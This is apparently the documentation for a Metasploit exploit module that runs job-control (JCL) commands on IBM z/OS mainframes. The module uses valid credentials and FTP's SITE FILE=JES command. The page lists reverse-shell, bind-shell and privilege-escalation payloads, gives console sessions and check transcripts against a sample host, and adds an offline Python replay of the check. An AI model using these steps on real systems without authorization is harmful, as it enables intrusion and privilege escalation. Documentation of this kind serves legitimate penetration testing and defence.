
z/OS JCL authorized FTP-based command execution - hints & tips

In order to use this exploit, you must have valid credentials on the target z/OS system, and the account must be allowed to upload files via FTP. If in doubt, use the check function of the exploit.

Vulnerable Application

This exploit was tested against the FTP daemons of z/OS versions 1.13 and 2.1.

Payloads

If the exploit works, any JCL the user has rights to submit can be submitted.

See the cmd-type payloads under mainframe that have jcl in the payload name, e.g.:

msf exploit(ftp_jcl_creds) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   cmd/mainframe/apf_privesc_jcl                     normal  JCL to escalate privilages via APF LIB
   cmd/mainframe/bind_shell_jcl                      normal  Z/OS (MVS) Command Shell, Bind TCP
   cmd/mainframe/generic_jcl                         normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                   normal  Z/OS (MVS) Command Shell, Reverse TCP

Verification Steps

A successful check of the exploit will look like this:

msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info

       Name: FTP JCL Execution
     Module: exploit/mainframe/ftp/ftp_jcl_creds
   Platform: Mainframe
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-05-12

Available targets:
  Id  Name
  --  ----
  0   auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  password         no        The password for the specified username
  FTPUSER  ftptest          no        The username to authenticate as
  RHOST    10.10.10.1       yes       The target address
  RPORT    21               yes       The target port
  SLEEP    5                no        Time to wait before checking if job has completed.

Payload information:

Description:
  Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
  valid credentials on the target system

msf exploit(ftp_jcl_creds) > check

[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >

Debugging

If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG options of the exploit and run the check again. On a vulnerable system the output should look similar to the following.

msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check

[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on.  Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
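The transcript above is the whole decision the check makes: a 220 banner that identifies the IBM FTP server, a successful USER/PASS login, and a 200 reply to SITE FILE=JES. The following Python is an added example (not the module's own code) that replays that exchange against a constructed in-memory responder, with no network involved, so both sides' messages can be read and the decision logic tested. The banner test ("IBM FTP" in the 220 text) is an assumption made for this example; the page only says the module found the IBM z/OS banner. The generic-server branch is also constructed, to show the negative case. Defenders can use the same logic to confirm, for accounts they own, whether plain FTP access also implies the ability to hand jobs to JES.

```python
"""Offline replay of the ftp_jcl_creds check (added example, not the module's code).

Two constructed in-memory FTP responders stand in for real targets: one mimics
the z/OS FTP daemon using the replies seen in the debug transcript above, the
other a generic Unix-style daemon that rejects SITE FILE=JES.  No sockets are
opened; the transcript is assembled from both sides' messages.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class FakeFtpServer:
    """Scripted responder.  `jes_capable` decides the reply to SITE FILE=JES."""
    banner: str
    jes_capable: bool
    user: str = "ftptest"          # constructed test account
    password: str = "password"     # constructed test password
    _pending_user: Optional[str] = field(default=None, init=False)
    _logged_on: bool = field(default=False, init=False)

    def handle(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self._pending_user = arg
            return "331 Send password please."
        if verb == "PASS":
            if self._pending_user == self.user and arg == self.password:
                self._logged_on = True
                name = self.user.upper()
                return f'230 {name} is logged on.  Working directory is "{name}.".'
            return "530 PASS command failed"
        if verb == "SITE":
            if not self._logged_on:
                return "530 Please login with USER and PASS"
            if self.jes_capable and arg.upper() == "FILE=JES":
                return "200 SITE command was accepted"
            return "500 Unknown SITE command"
        return "502 Command not implemented"


# Banners copied from the transcript above (z/OS) and constructed (generic).
ZOS_BANNER = ("220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n"
              "220 Connection will close if idle for more than 5 minutes.")
GENERIC_BANNER = "220 (generic ftpd, constructed for this example)"


def jes_check(server: FakeFtpServer, user: str, password: str) -> Dict[str, object]:
    """Drive the USER/PASS/SITE FILE=JES exchange and report what was observed."""
    transcript: List[str] = [f"S: {server.banner}"]
    result: Dict[str, object] = {
        # Assumption for this example: the module's banner match is not shown on the page.
        "zos_banner": "IBM FTP" in server.banner,
        "logged_on": False,
        "jes_accepted": False,
        "transcript": transcript,
    }

    def send(cmd: str) -> str:
        transcript.append(f"C: {cmd}")
        reply = server.handle(cmd)
        transcript.append(f"S: {reply}")
        return reply

    if not send(f"USER {user}").startswith("331"):
        return result
    if not send(f"PASS {password}").startswith("230"):
        return result          # bad credentials: nothing further is attempted
    result["logged_on"] = True
    result["jes_accepted"] = send("SITE FILE=JES").startswith("200")
    return result


def is_vulnerable(result: Dict[str, object]) -> bool:
    """Same verdict the check prints: IBM banner seen and JES mode accepted."""
    return bool(result["zos_banner"]) and bool(result["jes_accepted"])


if __name__ == "__main__":
    zos = FakeFtpServer(ZOS_BANNER, jes_capable=True)
    res = jes_check(zos, "ftptest", "password")
    print("\n".join(res["transcript"]))
    print("vulnerable:", is_vulnerable(res))
```

Each call to jes_check builds a fresh transcript, so a failed login and a non-IBM server can be compared side by side with the vulnerable case; the transcript lines are the same "FTP send"/"FTP recv" pairs the FTPDEBUG output shows, minus the framing.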

Notes

Each job submitted this way leaves a job log on the system, attributed to the credentials that were used.
